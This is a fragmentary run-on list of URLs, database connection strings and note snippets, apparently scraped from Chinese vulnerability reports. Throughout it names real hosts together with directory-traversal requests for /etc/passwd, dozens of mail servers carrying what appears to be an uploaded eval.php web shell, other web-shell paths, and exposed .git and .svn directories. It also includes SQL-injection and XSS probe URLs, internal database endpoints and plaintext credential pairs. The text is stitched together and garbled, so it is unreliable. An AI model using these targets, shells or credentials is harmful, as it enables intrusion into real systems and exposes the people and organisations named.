http://3g.renren.com/home.do?sid=V6lNussTlH_2H-l6UimfaZ&bm=316589623_fcbfca64832f541115d682a76fd7536b_1415165048956&f=1 site:3g.renren.com http://3g.renren.com/home.do?from=9508001&sid=7johVoa59YO6RIlPerk5lZ&bm=437025963_40143d4e770812d812261a4a4b6ad530_1411564082922 http://**.**.**.**:8880/ http://**.**.**.** http://survey.ifeng.com/resultjson.php?surveyId=123 www.tonghuafund.com/ http://android.myapp.com/myapp/detail.htm?apkName=com.tlb http://bomeibian.koudai.com/j_spring_security_check http://115.236.70.108:8000/explore/projects localhost:8888 jdbc:mysql://115.236.70.108:3399/englishbreak alhost:8888***** jdbc:mysql://101.201.148.79:3306/englishbreak http://www.12301.cc/ http://www.12301.cc/buyProduct.html,可看到已买到的产品。这里以百度糯米网账号为例,可看到已支付但未使用的订单,可根据订单号、取票人手机以及凭证号从而使用别人的订单(简直是免费蹭吃蹭喝蹭玩啊。。。) http://**.**.**/resweb/logon.jsp http://**.**.**/bea_wls_internal/wooyun.jsp jdbc:oracle:thin:@192.168.7.15:1521:orcl http://**.**.**.**/bugs/wooyun-2015-0145311 http://**.**.**.**/manager/user.do?method=toFindPwd http://**.**.**.**/MemberCenter/certification/toCertification http://**.**.**.**/MemberCenter/home/domainNameResolutionHtml?domainName=**.**.**.** jdbc:db2://localhost:50000/jdc_rzx jdbc:db2://LOCALHOST:50000/JDC_RZX http://**.**.**.**/Login.aspx http://**.**.**.**:84/ http://www.laiyifen.com/index.php/article*-zhifufangshi*_huodaofukuan*-lists*-11**.html https://bbc.ztgame.com:8443/j_acegi_security_ch http://sqlmap.org jdbc:oracle:thin:@**.**.**.**:1521:hbboss http://**.**.**.**/webtool/ http://220.181.155.26:8080//././././././././././././././././././././././././../../../../../../../../etc/passwd http://220.181.155.26:8080/etc/passwd http://220.181.155.26:8080/etc/hosts http://119.167.145.109/.bash_history http://10.106.8.91/cgi-bin/src_oss_download.py?filename=000002010056CE741B-5A83CD2BDD518A673D0A27D43A0A391F-5A83CD2BDD518A.mp4 oss://yk-source/000002010056CE741B-5A83CD2BDD518A673D0A27D43A0A39 oss://yk-source/000002010056CE741B-5A83CD2BDD518A673D0A27D43A0A391F-5A83CD2BDD518A.mp4 http://101.251.214.139/zmw/index.jsp http://**.**.**.**:8220/ http://**.**.**.**/bms-web/login.html jdbc:oracle:thin:@**.**.**.**:1521/house http://**.**.**/index.php/sale/popedom/login/symbol/crd/default.shtml pwd:wooyun http://**.**.**/index.php/accept/index/view/id/81335/p/1/Status/1/type/waitorder/self/0/symbol/1/default.shtml http://deskadmin.cctv.com/ https://**.**.**/_ https://**.**.**/_ https://**.**.**/script_ com:netop/tingyun-***** com:netop/tingy***** com:netop/tingy***** com:netop/tingy***** http://**.**.**/bugs/wooyun-2016-0179640_ http://**.**.**/_ http://**.**.**/script_ http://vendorcms.ws.netease.com/login.jsp http://58.252.101.21/shouce.jsp http://58.252.101.21/tunnel.jsp http://ebiz.tpi.cntaiping.com/TPEBizWeb/FCKeditor//editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://ebiz.tpi.cntaiping.com/TPEBizWeb/UserFiles/Image/data.jsp jdbc:oracle:thin:@192.168.33.203:1521:tpebnew jdbc:oracle:thin:@10.0.96.33:1521:ywdev jdbc:oracle:thin:@10.0.96.33:1521:ywdev http://**.**.**.**/html/solution/success_case/2014/0903/82.html http://**.**.**.**/bugs/wooyun-2010-0146493 file://进行过滤,可能会导致一些安全问题。但是就这样只能执行一些简单的程序,很鸡肋,但只要结合闪电邮的另一个缺陷就能实现真正的命令执行。 http://srm.changhong.com http://srm.changhong.com:8082/srm/core/admin/user.do?_act=popDialog&propertyId=receiveUsersSplit&search_userType=sysuser https://mdm.haidilao.com/mdm/admin/authenticate.do https://103.240.244.6/mdm/f.jsp?z0=utf-8 http://www.laiyifen.com/memadmin/index.php http://222.136.71.26/web/xxfbgetfile.jsp?code=system&fileid=ff1602161517246259&filename=-1 https://github.com/mGoogle/LearnGit/blob/231c93d5304c34f45815d76eb1d41808c8a7a1ec/account.txt http://fuwu.sf-express.com/service/delivery/onRoad/922767843716/true http://fuwu.sf-express.com/service/delivery/signed/662924641066/true http://**.**.**.**:7001 http://**.**.**/live800/loginAction.jspcompanyLoginName=1&loginName=a111&password=111 http://bloom.newsmth.net/.svn/entries http://bbs.wan.58.com/uc_server/admin.php?sid=279dCl4qLSDlnm5ZAMOUv%2BnSGzYhbr8qMKvYDm1Jnmd32OfGlQRFcKs4gBM7doceOVP6edWh7iunAw http://www.suo1.cn/site/list.php?id=41 http://www.suo1.cn/inc/tmpukzmf.php http://www.suo1.cn/inc/1.php http://**.**.**.**/bugs/wooyun-2016-0177673 http://125.77.22.157/Module/Main.aspx http://sysadmin.v3.tvmining.com/tsysadmin http://cloudcenter.tvmining.com/tmcloudcenter/ http://**.**.**/live800/loginAction.jspcompanyLoginName=1%s&loginName=a111&password=111 https://github.com/ZXvivian/person_python_tool/blob/75516328d98d7c174b88e9d927962869e4f51bbf/email_metrics.py http://tong.duowan.com/login.php http://house.focus.cn/community/xiangshuwan/khlist.php?id=2 https://112.91.183.230/login http://119.254.111.96/.svn/entries http://album.kuwo.cn/album/c/mphotow?aid=2078300*&pid=5901124&uid=21259663 http://**.**.**/uac/web3/jsp/login/login.jsp http://www.godsgive.com/ zhanghao:westroad11 mima:love1107 http://180.153.108.177:8080/pos/ http://sup.yungouos.com/index.action https://task.sprucetec.com/login.jsp http://share.kuwo.cn/p/web/AjaxGetLeboByLabpn=1&labName=%E5%98%BB%E5%93%88*&order=desc http://share.kuwo.cn/p/web/AjaxGetLeboByLab?pn=1&labName=%E5%98%BB%E5%93%88*&order=desc https://www.beijing.com.cn/pages/stage/web/Declaration%20letter.jsp pay.yizhifubj.com/merchant/login.jsp https://www.yizhifubj.com/resources/2016-03-12/bc648818-c087-4199-be1d-ecfd766763ea.jsp https://mentry.bocichina.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://180.153.25.1/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://180.153.25.1:8080/web.zip http://222.73.243.39/cacti http://business.yeahka.com/o2o/user_shop/search_new.do?page=0&pageSize=20&time=20160312120334&adv_abled=2&x=121.040875&y=31.611332 http://id.ceair.com:7777/idmsso/login.jsp http://id.ceair.com:7777/ http://id.ceair.com:7777/manual/ http://id.ceair.com:7777/sysadmin/ http://id.ceair.com:7777/idmsso/login.jsp http://id.ceair.com:7777/iamsso/login.jsp http://id.ceair.com:7777/idmsso/ http://id.ceair.com:7777/idmsso/页面截图如下: com:7777 http://id.ceair.com:7777 http://123.103.10.175/zabbix/ http://api.g.sdo.com/game/getGameDetail?ticket=RNK76Qw9Qh8zy%2B4oa5PTieFNtofwLNzUldQEGxF8f2z%2BMPAywNLzdDsD5BuZriM%2BM9TPUlqvIpyLHsewQ%2F%2F0392HIOH60xFN2wr0DZGkqWk%3D&os=2%20and%201=1&netflag=WIFI&OperationSystem=ios&gameid=9999111&UserId=&v=2.0&version=i.6.1.0&OperationLocalTime=2016-03-12%2020%3A17%3A38&OperationVersion=9.2.1 http://oa.xywy.com/ http://119.90.59.90/index.html https://buy.cnooc.com.cn/cbjywebframe/.svn/entries https://buy.cnooc.com.cn/cbjyweb/.svn/entries https://buy.cnooc.com.cn/cbjylogin/.svn/entries http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://zhaopin.cnooc.com.cn http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute http://cctv.cnooc.com.cn/axis2-admin http://60.22.141.6:7001/maximo/webclient/login/login.jsp http://60.22.141.6:7001/bea_wls_internal/wooyun.jsp http://**.**.**/ https://github.com/qingmoyao/cashLoad-20150930/blob/7fa8e9bc7b6aa8ce3d7b3cfcf96b7280f3794b6e/xposp-service/src/main/profiles/dev/serviceContext.xml http://api.m.koudai.com http://i.auto.ifeng.com/index.php?c=yidianzixun&a=yidianhtml&type=cms&id=1052538 http://uc.audi.cn/ D93C9E2F72CEC3118EB6D563935343A3:FG=1 http://www.cnoocengineering.com/single.aspx?column_id=10454 http://api.m.xywy.com/api/?m=Askintegral&act=apply&appname=ask&edition=4.3&model=1&sign=3f36f776d163c6b6c74b1adfdc1b41db http://tclkt.etoway.cn/ http://tclkt.etoway.cn/ca/ma3.jsp?o=vLogin jdbc:oracle:thin:@172.16.103.16:1521:rdcms jdbc:oracle:thin:@172.16.103.16:1521:rdcms http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=Custom http://**.**.**/web/index.action_ http://sms.api.xiaoenai.com/v3/sms/client_verify_code http://game.feng.com/index.php?r=apiw/apiGiftBag/getNewGiftBagNum http://zb.hupu.com/search?s=%22%20OR%207838=7848%20AND%20%22Fsxo%22=%22Fsxo http://zb.hupu.com/search?s=%22%20OR%207838=7838%20AND%20%22Fsxo%22=%22Fsxo http://logs.51cto.com/rizhi2&pageurl=http%3A//network.51cto.com/&referer=http%3A//developer.51cto.com/art/201505/475552.htm&language=zh-CN&color=24&screensize=1280*800&debug=undefined&firsttime=116-3-14-9-55-50&lasttime=116-3-14-9-55-50&type=1&charset=GBK&timezone=-8&return1=1 http://network.51cto.com/ http://office.focus.cn/group/photo_search.php?group_id=80000&page=1&search_area=thesite&search_str=&search_type=picname&submit=%cb%d1%cb%f7%cd%bc%c6%ac http://**.**.**/portal user:weblogic pwd:weblogic http://**.**.**/whoami/whoami.jsp jdbc:oracle:thin:@172.16.18.108:1521:ievsp password:bpm http://admin.joygossip.joy.cn/user/user_index#_blank http://**.**.**/p/mb/GetContentpage=1&start=1&from=pc&id=123&mbuid=53036358 http://app.art.ifeng.com/?app=system&controller=fall&action=freelist_page&flid=1*&jsoncallback=jsonp1457941973953&page=2&_=1457941977376 http://**.**.**/_ http://**.**.**/_searchpreety_ http://**.**.**/_plugin/head/_ www.chinahr.com/tia***** http://cms.caohua.com/Member/Register.aspx http://www.caohua.com/game.html http://www.caohua.com/soulb http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m= http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx http://**.**.**.**/ane56os/backuser/login http://118.145.26.196/zabbix/index.php https://112.124.8.165:5887/orders/orders_list.jsp# http://121.199.10.19:8322/images/authorizeImg/liubin1.jpg http://**.**.**.**/kitty/?page=Download http://qar.csair.com/mc/login.jsp http://www.nbopen.com.cn:80/ www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 www.nbopen.com.cn http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1* http://**.**.**.**/housing/help.jspx jdbc:oracle:thin:@**.**.**.**:1524/houseys jdbc:oracle:thin:@**.**.**.**:1521/house jdbc:oracle:thin:@**.**.**.**:1522/house jdbc:oracle:thin:@**.**.**.**:1525/housewy https://work.gongchang.com https://work.gongchang.com/account/login/findPassword?gct=6.0.2-1.3 URL:http://**.**.**.**/review/detail.php?program=r_french&id=209 http://**.**.**/_searchpreety_ http://**.**.**/_plugin/head/_ http://**.**.**/_plugin/sql/_ http://**.**.**.**:80 http://2014beijing.geely.com/2014beijing.tar.gz http://2014beijing.geely.com/bocadmin/index.php?login http://global.geely.com/favicon.ico/a.php http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343 http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343 jiazhuo:jz$61088 https://**.**.**/articlelist.pagetype_id=08 https://**.**.**/articlelist.pagetype_id=08 http://**.**.**/articlelist.pagetype_id=20 http://**.**.**/articlelist.pagetype_id=04&type_flg=xwgg_ http://**.**.**/articlelist.pagetype_id=07_ http://**.**.**/articlelist.pagetype_id=07_ http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articlelist.pagetype_id=02&type_flg=xwgg_ http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articlelist.pagetype_id=02&type_flg=xwgg_ http://**.**.**/articlelist.pagetype_id=05&type_flg_ http://**.**.**/articlelist.pagetype_id=01&type_flg=lcgl_ http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articlelist.pagetype_id=08_ http://**.**.**/articleview.pagearticle_id=269A21DB047D7DC5E050007F01007743&type_id=20&type_flg_ http://**.**.**/articleview.pagearticle_id=0102dd03-dc4b-11e5-9991-40f2e9d8c09a&type_id=04&type_flg=xwgg_ http://**.**.**/articleview.pagearticle_id=7e299055e72b11e5a8b440f2e92e2622&type_id=03_ http://**.**.**/articleview.pagearticle_id=b33cfe94-7e7a-11e4-a50f-40f2e99cef5a&type_id=07&type_flg_ http://**.**.**/articleview.pagearticleId=851eeb1d-a6f9-11e5-979e-00163e0024e9&type_id=10&type_flg=0&index=3&contentId=851eeb1d-a6f9-11e5-979e-00163e0024e9&contentType=10&type=2_ http://**.**.**/articleview.pagearticle_id=c4c39d5d-85c3-11e4-912a-94de80cbc04c&type_id=06&type_flg=lcgl_ http://**.**.**/articleview.pagearticleId=88399c9c-b4db-11e5-884f-1051721b3c39&type_id=10&type_flg=0&index=3&contentId=88399c9c-b4db-11e5-884f-1051721b3c39&contentType=10&type=2_ http://**.**.**/articleview.pagearticle_id=01833ea8-2549-11e5-9a92-00163e000e7b&type_id=08&type_flg_ http://**.**.**/articleview.pagearticle_id=89944d3b-7ba4-11e5-9838-1051721d3b60&type_id=01&type_flg=lcgl_ http://**.**.**/articleview.pagearticle_id=a831146b-e697-11e5-ba53-288023a0e8b4&type_id=08&type_flg_ http://**.**.**/ https://xxxx/ http://cs.gamebar.com/faq.php?id=1 http://train.guosen.com.cn:8080使用的是新为软件E-learning系统,恰好前不久写了这个插件,于是直接尝试居然直接命中 http://api.5211game.com/YYMEPassport/Simulator http://**.**.**/_ cast:192.168.3.255***** fe7f:2c***** dropped:0***** http://**.**.**.**:7003/ http://**.**.**.**:7003/cas/re.jsp https://github.com/search?utf8=%E2%9C%93&q=mail.rong360.com&type=Code&ref=searchresults jdbc:oracle:thin:@**.**.**.**:1521/house http://api.b.360.cn/.git https://**.**.**.**:1443,拿出神器立马xxoo返回一个shell https://vpn.renren-inc.com/dana-na/auth/url_default/welcome.cgi http://www.juntu.com http://211.100.75.190/user/admin http://**.**.**.**/ http://**.**.**.**/jyjg/list_32.aspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://wifi.shengcaijinrong.com/Accountcenter/accountmiddle www.csairshop.com http://211.100.44.243/ http://**.**.**/_ http://**.**.**/loginfrom=%2F_ http://userreport.yulong.com/usercontrol.php http://webmail.now.cn/up/UploadTemp/eval.php http://mail.almozan.net/up/UploadTemp/eval.php http://mail.wdfsy.com/up/UploadTemp/eval.php http://mail.shtchem.com/up/UploadTemp/eval.php http://mail.jinling.com/up/UploadTemp/eval.php http://mail.almozan.net/up/UploadTemp/eval.php http://mail.szfine.com/up/UploadTemp/eval.php http://webmail.zhicheng-holdings.com/up/UploadTemp/eval.php http://mail.wdfsy.com/up/UploadTemp/eval.php http://webmail.mvl.hk/up/UploadTemp/eval.php http://mail.milliondollarbaby.com.cn/up/UploadTemp/eval.php http://webmail.zhdvt.com/up/UploadTemp/eval.php http://mx622.now.net.cn/up/UploadTemp/eval.php http://mail.hamilsonjewelry.com/up/UploadTemp/eval.php http://mail.gofeng.hk/up/UploadTemp/eval.php http://103.242.101.180/up/UploadTemp/eval.php http://mail.longoent.com/up/UploadTemp/eval.php http://mail.echidu.com/up/UploadTemp/eval.php http://webmail.arcplan.com.cn/up/UploadTemp/eval.php http://mail.cissst.com/up/UploadTemp/eval.php http://pop.lhgltd.com/up/UploadTemp/eval.php http://mail.chineseinflatables.cn/up/UploadTemp/eval.php http://103.242.101.222/up/UploadTemp/eval.php http://103.242.101.157/up/UploadTemp/eval.php http://mail.fuhong.org.mo/up/UploadTemp/eval.php http://mail.apec-pcb.com/up/UploadTemp/eval.php http://mail.radiobuoy.net/up/UploadTemp/eval.php http://mail.hanminghy.com/up/UploadTemp/eval.php http://mail.shtchem.com/up/UploadTemp/eval.php http://mail.ap-trade.net/up/UploadTemp/eval.php http://103.242.101.192/up/UploadTemp/eval.php http://mail.uptowntradingco.com/up/UploadTemp/eval.php http://pop.kongfung.com.cn/up/UploadTemp/eval.php http://mail.fellowes-ic.com/up/UploadTemp/eval.php http://mail.gd-xinjiye.com/up/UploadTemp/eval.php http://mail.ntcz.cc/up/UploadTemp/eval.php http://pop.hjglassware.com/up/UploadTemp/eval.php http://59.38.124.22/up/UploadTemp/eval.php http://59.38.124.3/up/UploadTemp/eval.php http://mail.uci-holdings.com.hk/up/UploadTemp/eval.php http://mail.ccon.com.cn/up/UploadTemp/eval.php http://mx603.now.net.cn/up/UploadTemp/eval.php http://mail.joinway.com/up/UploadTemp/eval.php http://mail.shuziguigu.com/up/UploadTemp/eval.php http://mail.mythunder.com.cn/up/UploadTemp/eval.php http://mail.khtship.com/up/UploadTemp/eval.php http://mail.newsea.cn/up/UploadTemp/eval.php http://mail.zhgxjs.com/up/UploadTemp/eval.php http://59.38.124.4/up/UploadTemp/eval.php http://mail.zjpxzx.com/up/UploadTemp/eval.php http://59.38.124.3:88/up/UploadTemp/eval.php http://mail.cn-mst.com/up/UploadTemp/eval.php http://pop.hjglassware.com/up/UploadTemp/eval.php http://mail.seastar-tech.com/up/UploadTemp/eval.php http://mail.howata.com/up/UploadTemp/eval.php http://mail.xjhuaao.com/up/UploadTemp/eval.php http://mx606.now.net.cn/up/UploadTemp/eval.php http://pop.kongfung.com.cn/up/UploadTemp/eval.php http://mail.ccon.com.cn/up/UploadTemp/eval.php http://mail.joinway.com/up/UploadTemp/eval.php http://mail.newsea.cn/up/UploadTemp/eval.php http://webmail.arcplan.com.cn/up/UploadTemp/eval.php http://mail.zjpxzx.com/up/UploadTemp/eval.php http://mail.fellowes-ic.com/up/UploadTemp/eval.php http://mail.mythunder.com.cn/up/UploadTemp/eval.php http://mail.gd-xinjiye.com/up/UploadTemp/eval.php http://mail.echidu.com/up/UploadTemp/eval.php http://mail.zhgxjs.com/up/UploadTemp/eval.php http://mail.uci-holdings.com.hk/up/UploadTemp/eval.php http://mail.ntcz.cc/up/UploadTemp/eval.php http://mail.shuziguigu.com/up/UploadTemp/eval.php http://pop.lhgltd.com/up/UploadTemp/eval.php http://webmail.sbtoy.com/up/UploadTemp/eval.php http://mail.sxpfw.gov.cn/up/UploadTemp/eval.php http://webmail.zhtally.cn/up/UploadTemp/eval.php http://mail.cisi.hk/up/UploadTemp/eval.php http://mail.fuhong.org.mo/up/UploadTemp/eval.php http://mail.apec-pcb.com/up/UploadTemp/eval.php http://mail.radiobuoy.net/up/UploadTemp/eval.php http://webmail.mvl.hk/up/UploadTemp/eval.php http://mail.almozan.net/up/UploadTemp/eval.php http://mail.wdfsy.com/up/UploadTemp/eval.php http://webmail.zhdvt.com/up/UploadTemp/eval.php http://mail.cisi.hk/up/UploadTemp/eval.php http://mail.fuhong.org.mo/up/UploadTemp/eval.php http://mail.apec-pcb.com/up/UploadTemp/eval.php http://mail.radiobuoy.net/up/UploadTemp/eval.php http://webmail.mvl.hk/up/UploadTemp/eval.php http://mail.almozan.net/up/UploadTemp/eval.php http://mail.wdfsy.com/up/UploadTemp/eval.php http://webmail.zhdvt.com/up/UploadTemp/eval.php http://yimin.edai.com/news.php?classid=3 http://211.137.182.86:8083/report/ http://e.cheyipai.com/WebController/LogInManage/Index重置密码 http://expo.cfw.cn/zhlist.aspx?year=0&month=0&hy=1&pg=1 http://**.**.**.**/ http://xiaojiadianvideo.asia/a/member.php?kobj_mb_id=82801549 http://api.sina.cn/sinago/register.json?uid=8cbb26e31cdf061e&from=6049395012&wm=b207&oldchwm=14020_0001&chwm=14020_0001&imei=A0000055919C95 http://mail.haolyy.com:8008/Index/Login http://mail.haolyy.com:8008/ http://58.251.33.183:8080/ http://58.251.33.183:8080/zecmd/zecmd.jsp https://58.251.33.183/ http://www.edingtou.com/member/common/lookforpwd.html https://**.**.**.**/exploits/39241/ http://www.xmairhotels.com/admin/ImageShow.asp?imgKey=20100119155428 http://bcy.net/coser/detail/69057/489203 http://**.**.**.**/w2/index.jsp http://**.**.**.**/wap/index.do http://open.chinaums.com:5811/采用的时ecmall,查看了下相关的插件。发现基本都没有成功,然后自己手工查看了下,居然是部署有waf http://mapi.cheyipai.com//Order/GetBidHistoryList?businessid=308330&onlineId=c16af131-36f1-4d8f-95a7-fdd777825f1a&aucRootTag=0&pageIndex=1&pageSize=10&version=4.0.8&clienttype=1&markTime=0&searchTxt=1&memberCode=US015183&ip=192.168.137.2&imei=72A567F4-48FE-4353-953F-176F185149D6 https://**.**.**.**/directBank/login/forgetPassword.do?bankCode=3004 http://**.**.**.**/robots.txt%00.php http://180.168.192.22:10000/bak/),存在Jboss反序列化漏洞 https://mybank.jsbchina.cn/pweb/static/index.html#/mainView/LoginPasswordReset/mod___nav=1&sec=1&navIndex=6 http://118.186.245.72/index/contents.action http://112.64.185.236:9090/home.jsp https://**.**.**.**/desktop/index.html#/main/RetrievePassword/mod$inTrs http://bcy.net/coser/editpost/68992/489501 http://test.wap.frbao.com:8181/sys/login.action http://test.wap.frbao.com:8181/k8cmd.jsp http://www.fenqile.com/user/forget_pwd.html https://misc.douban.com/vpn/douban-vpn.html http://openid2.dapps.douban.com/server/endpoint/?openid.assoc_handle=%7BHMAC-SHA1%7D%7B56ea9af3%7D%7BtbWH9A%3D%3D%7D&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.realm=http%3A%2F%2Felearning.intra.douban.com&openid.return_to=http%3A%2F%2Felearning.intra.douban.com%2F_dae%2Flogin%2Fverify%2F%3Fcontinue%3Dhttp%253A%252F%252Felearning.intra.douban.com%252Flesson%252F%26janrain_nonce%3D2016-03-18T12%253A23%253A37ZijUOUU&openid.sreg.optional=username%2Cuid&openid.sreg.required=email%2Cgroups http://220.248.19.22:80/ http://220.248.19.21:8088/ http://211.95.2.35/ http://**.**.**.**/w3g/app/18291094.html http://bcy.net/article/new http://bcy.net http://deskadmin.cctv.com test123:test123 http://jira.bltech.cn/general/score/flow/scoredate/result.php?FLOW_ID=%bf%27%20 http://house.19lou.com/newhouse-house-1&area=0&name=&price=0&houseType=0&homeType=%E5%A4%8D%E5%BC%8F%E5%AE%A4* http://house.19lou.com/newhouse-house-1&area=0&name=&price=0&houseType=0&homeType=%E5%A4%8D%E5%BC%8F%E5%AE%A4* http://m.rrs.com/snaplb/consulting/query/productlist?productTypeId=11&_=1458245171371 http://www.bypay.cn http://122.144.144.199/ http://60.28.217.187:8088/.svn/entries http://60.28.217.187:8088 https://**.**.**.**/ebweb/prelogin.do?BankId=9999&_locale=zh_CN http://us.speedx.com http://us.speedx.com/forum/uc_server/data/cache/apps.php http://tester.speedforce.com:7777/admin http://tester.speedforce.com:9999/admin http://weixin.haolyy.com/.git/config http://vip.haolyy.com/log.txt http://v.duba.com/moviedetail/98909*.html http://golf.cctv.com/e/extend/court/court_search.php?page=28&pt=1 http://**.**.**.**/ http://**.**.**.**/newscenter/ztbd/2009-02/10/content_15656399.htm http://vs.ptbus.com/zblb_1/?name=%E5%B0%8F%E6%89%8B%E9%81%AE%E5%A4%A9 http://id.ourgame.com/shika/shika/createShiKa/about.do http://id.ourgame.com/shika/shika/createShiKa/about.do http://dz.cheyipai.com/ http://vx.268v.com/Login.aspx?ReturnUrl=%2f http://**.**.**.**/mobctsystopadvertising http://**.**.**.**/mobctsystopadvertising http://drops.wooyun.org/tips/749 http://www.sosocome.com/ http://www.pgyer.com/uMWn http://www.pgyer.com/ZAjT www.sosocome.com http://qijilanqiu.game.weibo.com/admin/notice?appId=1 http://brand.creditease.cn(和 http://brand.creditease.cn/activity-single.htm?id=22 http://brand.creditease.cn/activity-single.htm www.ceairdutyfree.com http://www.ceairdutyfree.com/p_list.aspx?isHot=1 http://www.ceairdutyfree.com/p_list.aspx?isHot=1 http://www.ceairdutyfree.com/p_list.aspx?isHot=1 http://211.162.66.163:9999/login.action http://**.**.**.**:7003/ecdomain/framework/housingfund/index.jsp http://s.**.**.**.**/ http://y.**.**.**.**/order360/OrderCenter/Home/detail?orderId=%27 http://www.scal.com.cn/Web/Home/GetTerminalServicesList http://**.**.**.**:8080/bocoit/common2.asp?id=2488 http://cabin.ceair.com/ http://id.ceair.com:7777/idmsso/login.jsp?authn_try_count=0&contextType=external&username=string&contextValue=%2Foam&password=sercure_string&challenge_url=http%3A%2F%2Fid.ceair.com%3A7777%2Fidmsso%2Flogin.jsp&request_id=-2769253801084227145&locale=zh_CN&resource_url=http%253A%252F%252Fcabin.ceair.com%252Fportal%252F http://ct400.cn/ http://www.sh-holiday.com/ http://www.sh-holiday.com/tourism/dhth/list?departcity=HGH&destinationcity=&keywords=1&startdate1=&startdate2= http://wtv.5211game.com:80/Default/Service/NewService.ashx?op=NewsLisAll&categoryIds=11 http://pk.tom.com/ http://pk.tom.com/web/download_page.jsp?source=HP_mobilegame_bybsb&mobile_game_id=1294&from=00403&class=and&q_id=99 http://jr.yichemall.com/Search/GetFinaceCarImgData?carIds=1*&_=1458391361838 http://**.**.**.**:80/ http://sh.51jiabo.com/member/login.shtml?redirect_url=b3JkZXIvc2FsZQ==%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://zz.51jiabo.com/get_special_coupon?code_id=2 http://qd.51jiabo.com/get_special_coupon?code_id=2 http://sh.51jiabo.com/get_special_coupon?code_id=2 http://www.ticket.51jiabo.com/.git/config http://gz.ticket.51jiabo.com/.git/config http://ks.ticket.51jiabo.com/.git/config http://gamemanager.duowan.com/auther/login.html https://img.mabudai.com/file/request/get?request_attach_id=647&user_uid=4216&token=34259f0eab34a3934fb2778205b4a126 http://piwik.jiea.iqianjin.com:8888 http://piwik.jiea.iqianjin.com:8888//plugins/weathermap/editor.php http://piwik.jiea.iqianjin.com:8888//plugins/weathermap/configs/f.php?ca=assert http://uimall.pflife.com.cn/ www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 uimall.pflife.com.cn/online/mall/index.jsp C6E3F9FD57E5DA4F9BB6CB28FA108AE5:FG=1 http://**.**.**.**/army_service.aspx http://app.finance.ifeng.com/stock/dxf/day.php?day=20080808&orderby=amount&ordertype=desc http://180.97.80.205/ http://180.97.80.205/appaction/bao_detail.php?id=51&time=0.9278282364830375 http://180.76.135.96 http://wooyun.org/bugs/wooyun-2016-0178214 http://oss.zszs.game.yy.com/ http://zc.urtrust.com.cn/ https://zc.urtrust.com.cn:9093/casserver/login?service=http%3A%2F%2Fzc.urtrust.com.cn%3A9080%2Fprpall%2Findex.jsp http://59.151.12.39/admin/PostsManager/NewPostsList.aspx http://**.**.**.**/index.php/Home/Index/goodslist2?pagetext=%E8%8A%B1%E8%8A%B1%E5%85%AC%E5%AD%90 http://wooyun.org/bugs/wooyun-2010-0177548 http://**.**.**/_ http://**.**.**/script_ jdbc:oracle:thin:@**.**.**.**:1521:irms11g http://tbpms.cheyipai.com http://202.101.47.116/Login.aspx?doFrom=index http://180.168.192.19:80/ http://www.lixin360.com/home/upDown.jhtml?keyName=teamId&objId=57&tableName=Team&_=1458464999822 http://mobile.kuwo.cn/mpage/special/showSpecalShare.jsp?id=1874 http://mobile.kuwo.cn/mpage/special/showSpecalShare.jsp?id=1874 http://sqlmap.org http://192.168.48.250/frontweb/login.html http://192.168.48.250/login.php http://www.elegantliving.cn/ jdbc:mysql://localhost:3306/living3?pinGlobalTxToPhysicalConnection=true http://10.3.3.165:7001/uddi/wooyun.jsp http://android.myapp.com/myapp/detail.htm?apkName=com.jjl http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://114.112.88.208:7300/server/page_download/ admin:123456 https://github.com/zbwill/SnailApp/blob/f6060043dc2643839c523b38d9c84c34e8804b77/tests/projects/duobao/HYGMSBaseAction.py www.ganji.com https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.0apk https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/issue%00.0apk http://xing.268v.com http://xing.268v.com/pages/forms/SaleBill.aspx?bid=764&wfno=SG108&bizid=764&carid=536&biztype=0¤tSubWfNo=&wfnod=SG107&isarea= http://app.mofang.com/ http://116.55.241.7:9091/manager/html http://116.55.241.7:9091/job/index.jsp http://10.180.201.163:8081 http://10.180.201.228:8080 http://10.180.201.229:8081 http://10.180.201.235:80 http://10.180.201.240:80 http://ffp.okair.net/welcome.action 